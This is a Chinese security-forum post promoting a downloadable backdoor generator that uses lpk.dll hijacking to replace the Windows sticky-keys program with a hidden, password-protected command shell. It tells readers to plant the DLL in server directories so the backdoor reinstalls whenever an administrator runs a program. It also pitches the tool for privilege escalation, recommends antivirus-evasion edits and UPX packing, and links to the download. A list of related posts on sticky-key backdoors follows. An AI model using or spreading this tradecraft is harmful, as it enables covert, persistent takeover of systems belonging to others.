T00ls Lpk Sethc 首创lpk劫持方式粘滞键后门,体积超小!
T00ls Lpk Sethc测试使用视频,看完帖子不明白的看视频马上就明白了
http://Rices.So/lpk.html
T00ls同步更新:
http://t00ls.net/thread-15783-1-1.html
============================================================
什么是lpk:
就是一系统dll,位于system32目录下,特点是每个可执行文件运行之前都要加载此dll
而windows系统特性是先判断文件目录是否存在此dll再判断system32目录
由此基于lpk的dll劫持就产生了,本工具只是利用这一特性而扩展编写的!
=======================以上为lpk.dll的一些说明=======================
话不多说上图:
特别说明:
1.说下特点吧,生成出来以后是lpk.dll
将此文件放在服务器任何有exe的目录,比如serv-u,mysql等安装目录
然后运行目录下的任何exe,后门就已经自动替换好了~
2.当然也可以当作辅助提权所用,有可写目录的话都可以网目录里面传下!
这样当管理下次运行此目录下的可执行文件以后,后门也就产生了!同理,就算管理删了你的后门但是你的dll还在,那么管理一运行,就又替换了
3.昨天才写完所以有点粗糙,很多功能也不完善,暂时只支持3个热键呼出,相信热键多了你自己也按不过来 = =!
而这里要填热键代码,压缩包里面我会把热键代码表打包,你要设置哪3个热键,
只需要在txt里面找到那个键对应的值,然后填写到上图的3个编辑框中!
4.热键呼出后当然就是密码了,密码最终是采用的32位md5,只要你密码设置的够难
别人通过system32下载了你的后门也是无济于事!
5.生成器目录下的LPK.DAT即是主文件,可以直接对其进行免杀修改等处理!
6.建议生成时候选上upx压缩,这样出来体积50kb,还没有一个shell大!当然你也可以加别的保护工具!
7.本程序适用于 2K/3K/XP 2008没有测试,有兴趣的可以测试下! win7/vista系统已经不支持劫持lpk,但是可以通过修改注册表达到,但是这样就没有什么意义了!
8.重点说明下,呼出后门的时候3个热键一定要同时按下!比如我设置了A+B+C键呼出,必须ABC同时按,而不是先按下A再按下B这样
由于本程序并非采用注册热键!而是采用的监控键按下的状态,优点是可以任意支配热键,整个键盘你想怎么搭配热键就怎么搭建
缺点如上呼出的时候必须同时按下!
=======================以上为生成以及呼出的一些说明 =======================
后门界面:
除了左上角多了个白框,其他地方是100%的高仿..由于粘滞键自身的窗口样式实在特殊
查了很多资料很多方法都不能模仿完美!
密码界面:
功能界面:
输入要执行的命令直接”RUN”运行,下面会有回显
执行命令:
考虑到某些服务器无法执行cmd命令或者一些其他的原因,所以添加一个功能”直捣黄龙”,按下直接开桌面,再按一下即可隐藏winlogo登陆界面!
想方便的用这个功能也不错!
=======================以上为功能界面的一些说明 =======================
最后还要说下,本程序缺陷之1就是热键,必须同时按下,所以如果发现无法呼出,请多按几次!
当前版本:v1.0
lpk.dll大小(171kb)
lpk.dll使用upx压缩后大小(59kb)
下载地址:
http://rices.so/T00ls Lpk Sethc v1.0.rar
T00ls Lpk Sethc 首创lpk劫持方式粘滞键后门,体积超小!相关推荐
- lpk劫持方式粘滞键后门后门T00ls Lpk Sethc v3.0 正式版下载
从lpk到lpk2到现在也半年多了 让3.0做个完结吧 该写的功能也写完了 3.0集中修复了几乎所有的bug 包括密码被破解方面的问题 以及windows文件保护的问题! 新增加了wget和后门界面的 ...
- (windows图形化界)粘滞键后门
(windows图形化界)粘滞键后门 思路:windows图形化界面未登入用户时,连按5次Shift键粘滞键的程序依然可以弹出,若若把粘滞键的程序改为其他程序则有不一样的效果(如cmd程序). 一.手 ...
- 关于windows的粘滞键后门漏洞
一.适应范围 该漏洞仅适用于Windows7及以下的windows操作系统. 二.粘滞键介绍 粘滞键是一种快捷键,是为同时按下两个或多个键有困难的人而设计的,要功能是方便Shift.Ctrl.Alt与 ...
- 利用更改Windows7粘滞键漏洞破解登录密码
利用更改Windows7粘滞键漏洞破解登录密码 实验介绍: 本次实验内容主要是更改Windows7内核中的管理员权限,然后利用 "命令提示符"(cmd.exe)可覆盖"粘 ...
- 如何修改粘滞键启动的程序
有时候忘记了windows7启动的密码,手边又没有U盘,就可以用windows7粘滞键的一个bug,来修改密码.这需要使用粘滞键的程序. 在电脑上连续按下5次shift键,即可唤出粘滞键. 粘滞键的文 ...
- 粘滞键引起的提权实战
在某论坛阅读文章的时候看到一个粘滞键的概念,一时兴起百度了一下,思考了一下发现似乎有后门可以利用 先用我win10虚拟机查看一下win10的粘滞键在什么位置 打开控制面板如下: 找到键盘打开粘滞键 按 ...
- 【权限维持】Windows自启动映像劫持粘滞键辅助屏保后门WinLogon
文章目录 权限维持-域环境&单机版-自启动 权限维持-域环境&单机版-粘滞键 权限维持-域环境&单机版-映像劫持 权限维持-域环境&单机版-屏保&登录 权限维持 ...
- 使用粘滞键在Windows中留后门
使用粘滞键的原理是将我们的命令提示符替换成粘滞键,从而不需要在登录到计算机桌面即可使用命令提示符来进行操作,粘滞键的开启方式:连按五下shift键开启粘滞键 粘滞键的位置 CMD的位置即命令提示符 此 ...
- windows操作系统实验之粘滞键漏洞
Win7粘滞键漏洞 一.原理: 在Windows系统登录界面状态下,粘滞键仍可以以连续按5下SHIFT键运行,并且此时应用程序会以WINDOWS的最高权限-SYSTEM权限运行,所以计算机一旦被安装该 ...
最新文章
- cx_oracle写日志信息_日志系统的设计
- FSM状态机之状态模式
- 分布式ID-数据库多主模式
- 一张图看懂小程序全生态
- 另辟蹊径:从其他角度去解决数据库问题
- 计算机主机拆解,计算机硬件系统及主机拆解..ppt
- 方法的形式参数是类名的时候如何调用
- 面试题 01.01. 判定字符是否唯一 (计数排序思想)
- Zabbix通过自动发现监控端口
- 图像变换——对数变换
- 算法——排序——快速排序图解动画
- Ajax请求下载文件
- java操作txt文件目录
- SQL Server 数据库之数据完整性
- 无法打开包括文件: “ocl_macros.h”: No such file or directory
- VC浏览器相关的学习(一)(Single document界面)
- 2021年6月上市公司新闻舆论事件分析报告合集
- 苹果电脑:快捷键使用
- 如何运行app和exe程序
- 准确率、精确率、召回率、F1-score